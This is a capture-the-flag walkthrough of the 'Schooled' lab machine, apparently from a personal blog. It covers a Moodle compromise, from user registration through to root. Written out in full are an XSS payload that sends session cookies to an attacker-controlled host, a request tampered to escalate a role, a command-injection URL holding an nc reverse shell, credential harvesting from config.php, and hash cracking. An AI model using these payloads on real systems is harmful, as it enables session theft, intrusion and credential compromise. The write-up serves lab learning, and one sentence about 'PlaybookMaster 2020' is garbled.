In this post, i would like to share a walkthrough on Schooled Machine.


This room is been considered difficulty rated as a Medium machine

Information Gathering on Schooled


Once we have started the VPN connection, we can start the information gathering on the machine by executing the command nmap -sC -sV <IP Address> -PN 


The above is the nmap result


On the gobuster result, it shows that there’s moodle subdomain.


Let’s open the browser and straight into the website interface.


The website interface shows the available courses


We need to create a new account to login into the Dashboard


We need to register the email by following the formatting: user@student.schooled.htb


Once you complete registration, you will see the interface as shown above.

Enumerate further on the website application


The screenshot above is the Dashboard of the system


On the Site home page, there’s a bunch of subjects that we can register into. Click the button “Enrol me” for us to register the subject.


There’s an Announcement that has written by the lecturer Manual Philips which hinted we need to settings our MoodleNet profile before enrolled the subject. As a result, we un-enroll back the subject and add some xss script there.

On the MoodleNet profile, you can insert the xss script as below
<script>new  Image().src="http://<VPN IP>:<PORT>?output="+document.cookie;</script>

Before clicking the button update at the bottom, let’s start our nc listening


You will receive the cookie value after you have clicked the update button during the previous activity.


We can copy and paste the cookie on the Web Inspector, but you can also use BurpSuite for this activity.


I need to refresh the page once which shows a Manual Philips website interface. We need to add one new user by going to Participants and Enrol users. We should be adding another staff ID into the Courses and clicking “Enroll User” but I will show using Student ID.


You will see the difference by using different types of ID


However, you need to start burpsuite application to inspect the packet before adding a new ID to the Course


When click the enroll user button, we can see the request as shown above. We need to modify the value of role to assign into 1 such as shown below:

 roletoassign=1

On the profile, there’s an Administration section where we need to log in as. We need to click the link and the website interface will show something such as below:


The progress will be completed once you click the “Continue” button shown above.


However, we cannot see the Site Administration at the left bottom side of the interface.

Exploit the payload via burpsuite


It appears when you are login as another staff ID which i use Lianne Carter in this case.


Let’s check what configuration we can access inside Site Administrator


Oh No! We cannot upload the rce.zip in the plugin section. Let’s check back the video one more time.


We need to access the Users > Permissions > Define roles on the Site Administration section. We need to click the edit button and scroll the way down. Before we click the button “Save Settings”, we need to start our burpsuite and try to inspect the packet as shown below:


So, we can see the packet as above and replace the content from &return until Save Settings with a new payload that can be taken from the GitHub

Example of the payload used to get the full permissions


Once you have replaced the payload with the previous content, you can forward the packet to the website.

The Site Administration


Wuhuu! We managed to get a full set of Site Administration.


Let’s upload rce.zip into the plugin and install the plugin into the system.


We need to start our nc listener before doing the step below


*Just some reminder: The file will be auto-deleted after a while. So, please get a reverse shell connection back before the system deleted the file


Before we click the “install plugin” button, we need to be well-prepared for the URL command.

Command Injection on the schooled machine


The URL that we need to type would be putting their look something like the below:

moodle.schooled.htb/moodle/block/rce/lang/en/block_rce.php?cmd=rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc VPN IP Port >/tmp/f

After everything has been running in place, click install and you will something like below


Click Continue


Once we see this page, you can enter the URL that we have prepared before.


The webpage has been loading and has been given a blank page on the browser.

Obtain the reverse shell on the schooled machine


When looking back on the nc terminal, we got the reverse shell connection back.


Sadly, we cannot upgrade the shell into a proper one.


I try to surf the machine by running the command ls -la /usr/local/www/apache24/data/moodle and one file caught my attention.


For us to read the file, we need to type cat /usr/local/www/apache24/data/moodle/config.php command


Wuhuu! We found dbuser and dbpass in the config file which also mentions the database type (mysql)


We can verify that MySQL is installed in the machine by reading the rc.conf as shown above. Obviously, PlaybookMaster 2020 does not have the credentials that we can use for any service except MySQL.

Enumerate with the MySQL database


We already got the username and password for us to access the machine via ssh service. Oh, wait! The password is stored in hashes. Let’s crack the hashes using john the ripper.


The command that we will be using is john <filename> -w=/usr/share/wordlists/rockyou.txt and it will take some time


Now, we already got the username and password, and let’s access the machine via ssh service.

SSH access to the machine via Jamie’s credential


We managed to login to the machine with a proper shell.


We managed to get the user flag as shown above.

Escalate to Root Privileges Access on Schooled machine


For us to get escalated to root, we need to create a malicious package for the FreeBSD


I found a website (Creating Custom Packages on FreeBSD | lastsummer.de) that can help you in creating a malicious package for FreeBSD


*Disclaimer: The step to create a package is taken from the website itself.


You will be logged as root if all the steps inside the website have been executed properly.


For us to read the root flag, we can access the /root/ directory where normally root.txt been stored


-THE END-


Happy Learning Guys!